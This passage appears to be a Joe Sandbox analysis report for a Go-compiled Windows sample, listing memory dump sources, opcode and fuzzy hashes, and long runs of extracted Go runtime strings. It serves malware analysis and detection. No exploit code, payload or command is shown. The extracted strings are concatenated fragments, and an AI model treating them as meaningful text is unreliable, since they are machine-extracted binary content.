stateattempted to add zero-sized address rangeruntime: block
                      • API String ID: 0-1619921328
                      • Opcode ID: 42266ad7701e434287321457984a52d60fb800c333d46ffb8e4e5990762880e2
                      • Instruction ID: 7d557548f8054e76ad7eee9d0418c8028619105a1f47e76aa248bd8a8ffac31e
                      • Opcode Fuzzy Hash: 42266ad7701e434287321457984a52d60fb800c333d46ffb8e4e5990762880e2
                      • Instruction Fuzzy Hash: 3DE1D172605B8485DF609F21E4813AEB7AAF784B80F49813AEB8D57B99DF3CC494C710
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _snprintf$_errno_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3442832105-0
                      • Opcode ID: f518e0120c3d6e3aa0ccdadf425e12db238b36e208482e03aec2dc881709939c
                      • Instruction ID: 52ee38cfc0bb47e8a4c92e1377104d4836f753f997dd6c25f96d3f1e84503587
                      • Opcode Fuzzy Hash: f518e0120c3d6e3aa0ccdadf425e12db238b36e208482e03aec2dc881709939c
                      • Instruction Fuzzy Hash: 5452C13051CDA8ABE759AF2CD4867E9F7E1FFA8305F805258D985C7152EB31E582CB80
                      Strings
                      • args stack map entries for invalid runtime symbol tableruntime: no module data for mismatched isSending updates[originating from goroutine traceRegion: alloc too large18189894035458564758300781259094947017729282379150390625file descriptor in bad statedestinat, xrefs: 006CFACF
                      • untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431640625file too largeis a directorylevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many userswinapi error #unexpect, xrefs: 006CFB97
                      • locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of range227373675443232059478759765625socket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketreflect: Elem of inv, xrefs: 006CFC55
                      • runtime: pcdata is bad ABI description14901161193847656257450580596923828125bad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyreflect.Value.Bytesreflect.Value.Fieldreflect.Value.IndexEgypt Standard TimeSudan Standar, xrefs: 006CFA93, 006CFC1F
                      • untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-, xrefs: 006CFD0C
                      • bad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-IPv6 addressunkn, xrefs: 006CFB2A, 006CFCAA
                      • and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensen, xrefs: 006CFAAF, 006CFC3A
                      • (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad addressshort writebad argSizemethodargs(submissionsi/o timeout.WithCancel.WithValue(tls10serverHTTPS_PROXYhttps_proxyProcessPrngNetShareAddNetShareDelgocachehashgocache, xrefs: 006CFAF7, 006CFC78
                      • runtime: frame ts set in timertraceback stuck476837158203125advertise errorkey has expirednetwork is downno medium foundno such processinvalid argSize<invalid Value>,M3.2.0,M11.1.0missing address/etc/mdns.allowunknown networkx509keypairleaf()<>@,;:\"/[]?=jstmp, xrefs: 006CFB74, 006CFCE9
                      • missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-, xrefs: 006CFBD9, 006CFD59
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad addressshort writebad argSizemethodargs(submissionsi/o timeout.WithCancel.WithValue(tls10serverHTTPS_PROXYhttps_proxyProcessPrngNetShareAddNetShareDelgocachehashgocache$ and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensen$ args stack map entries for invalid runtime symbol tableruntime: no module data for mismatched isSending updates[originating from goroutine traceRegion: alloc too large18189894035458564758300781259094947017729282379150390625file descriptor in bad statedestinat$ locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of range227373675443232059478759765625socket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketreflect: Elem of inv$ untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431640625file too largeis a directorylevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many userswinapi error #unexpect$ untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-$bad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-IPv6 addressunkn$missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-$runtime: frame ts set in timertraceback stuck476837158203125advertise errorkey has expirednetwork is downno medium foundno such processinvalid argSize<invalid Value>,M3.2.0,M11.1.0missing address/etc/mdns.allowunknown networkx509keypairleaf()<>@,;:\"/[]?=jstmp$runtime: pcdata is bad ABI description14901161193847656257450580596923828125bad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyreflect.Value.Bytesreflect.Value.Fieldreflect.Value.IndexEgypt Standard TimeSudan Standar
                      • API String ID: 0-2771183557
                      • Opcode ID: 01a65d25c0be820b918ae928661da3330feb42d07981bb04a31a5a55f7860698
                      • Instruction ID: ad22383c43adc7e6874f5a5883d0af5f13072345875a23b57e530d1468dbb7bd
                      • Opcode Fuzzy Hash: 01a65d25c0be820b918ae928661da3330feb42d07981bb04a31a5a55f7860698
                      • Instruction Fuzzy Hash: 37E1E676218B8186DB94EF25E4807AAB3ABF788780F54512AEF8D43765DF3CC584CB44
                      Strings
                      • sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine 12207031256103515625owner died, xrefs: 006A31D5
                      • sweep increased allocation countremovespecial on invalid pointergetWeakHandle on invalid pointerruntime: root level max pages = NtAssociateWaitCompletionPacket, xrefs: 006A32CF
                      • mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006A31F0
                      • previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:, xrefs: 006A3285
                      • nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinvalid address wsaioctlunixgramavx512bwavx512vltlsk, xrefs: 006A3268
                      • swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006A318F
                      • sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executiontraceSto, xrefs: 006A317E
                      • mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification, xrefs: 006A3218
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$ nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinvalid address wsaioctlunixgramavx512bwavx512vltlsk$ previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:$ sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine 12207031256103515625owner died$mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification$sweep increased allocation countremovespecial on invalid pointergetWeakHandle on invalid pointerruntime: root level max pages = NtAssociateWaitCompletionPacket$sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executiontraceSto$swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
                      • API String ID: 0-2429654719
                      • Opcode ID: 5b431e0dacbd4b23277376cc6de9614fa7696c0ce87dc4f21b09db5ceb8a867b
                      • Instruction ID: f0872ff9524a5721e08f52c6e1ed480f7f0b33bffa00b942e854b4ab19fe0ded
                      • Opcode Fuzzy Hash: 5b431e0dacbd4b23277376cc6de9614fa7696c0ce87dc4f21b09db5ceb8a867b
                      • Instruction Fuzzy Hash: 1EF1F673208B9186CB50EF15E4903AE77A6F786B84F844126EB8D43766DF3CC995CB50
                      Strings
                      • findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for mismatch, xrefs: 006BF1A8
                      • global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755295395851135253906256938893903907228377647697925567626953125ryuFtoaFixed32 calle, xrefs: 006BF186
                      • findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruption186264514923095703125931322574615478515625link has been severedpackage , xrefs: 006BF1CA
                      • findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped, xrefs: 006BF197
                      • findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of r, xrefs: 006BF1B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of r$findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for mismatch$findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9network dropped$findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruption186264514923095703125931322574615478515625link has been severedpackage $global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755295395851135253906256938893903907228377647697925567626953125ryuFtoaFixed32 calle
                      • API String ID: 0-1954245510
                      • Opcode ID: fd6277bac395258e970f782220bb4edda94d5ff3369abbf4f9340d746068508f
                      • Instruction ID: 79ce674681b9de3f4635fbb01ec963e45e7d8fa911a72a0f9640e559baa681ec
                      • Opcode Fuzzy Hash: fd6277bac395258e970f782220bb4edda94d5ff3369abbf4f9340d746068508f
                      • Instruction Fuzzy Hash: 7692D4B2205BC485EB71CF25E8903EAB366F785B54F48412ACA8D57765DF3DC885CB40
                      Strings
                      • pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>Er, xrefs: 006D89B2
                      • fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &amp;&#34;&#39;httpsallowrangeclose:pathwritede, xrefs: 006D8972
                      • ...finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsud, xrefs: 006D87B7
                      • sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &amp;&#34;&#39;httpsallowrangeclose, xrefs: 006D8992
                      • non-Go function at pc=4656612873077392578125argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedunexpected method stepSao Tome Standard TimeAleutian Standard , xrefs: 006D8ADB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &amp;&#34;&#39;httpsallowrangeclose:pathwritede$ pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>Er$ sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<nil>ErrorntohsCall &amp;&#34;&#39;httpsallowrangeclose$...finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsud$non-Go function at pc=4656612873077392578125argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedunexpected method stepSao Tome Standard TimeAleutian Standard
                      • API String ID: 0-4165251877
                      • Opcode ID: 1a65a005d8feb5a770629186b82d9c06c17b696f12eb0f0e3d2a3d19198ba288
                      • Instruction ID: 5a07ada250fcef370e92c62cbadc1896bef2dc5ecaef3a4e040c8b11561214df
                      • Opcode Fuzzy Hash: 1a65a005d8feb5a770629186b82d9c06c17b696f12eb0f0e3d2a3d19198ba288
                      • Instruction Fuzzy Hash: 3B22383261DBC089DBA09B25E4943AEB7A6F789B80F54511AEACD47B59CF39C481CB04
                      Strings
                      • != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 006972E5
                      • &n, xrefs: 0069707C
                      • p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRight, xrefs: 0069730A
                      • runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32, xrefs: 006972AC
                      • flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= , xrefs: 006972C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= $p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRight$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32$&n
                      • API String ID: 0-61586829
                      • Opcode ID: 1128e15416b57a761d4fd9fb98a154fdab725f19f0b5ae7078ccfe694b64b5ad
                      • Instruction ID: 8cf005d6da5b7d7f337a99eb51362e5e890d2c13da2431dbb0a5f971de01ec7f
                      • Opcode Fuzzy Hash: 1128e15416b57a761d4fd9fb98a154fdab725f19f0b5ae7078ccfe694b64b5ad
                      • Instruction Fuzzy Hash: 7AF1B232309B8486DB50CF65F48139EB7AAF749750F44822AEA9D43BA6DF39C485CB44
                      Strings
                      • , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendl, xrefs: 006B72E5, 006B736F
                      • suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function traceRegion: alloc with concurrent drop277555756156289135105907917022705078125transport endpoint is alre, xrefs: 006B73CA
                      • , gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp, xrefs: 006B7305
                      • invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobje, xrefs: 006B73B9
                      • runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup298023223876953125operation canceledno child processesRFS specific erroridentifi, xrefs: 006B72C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
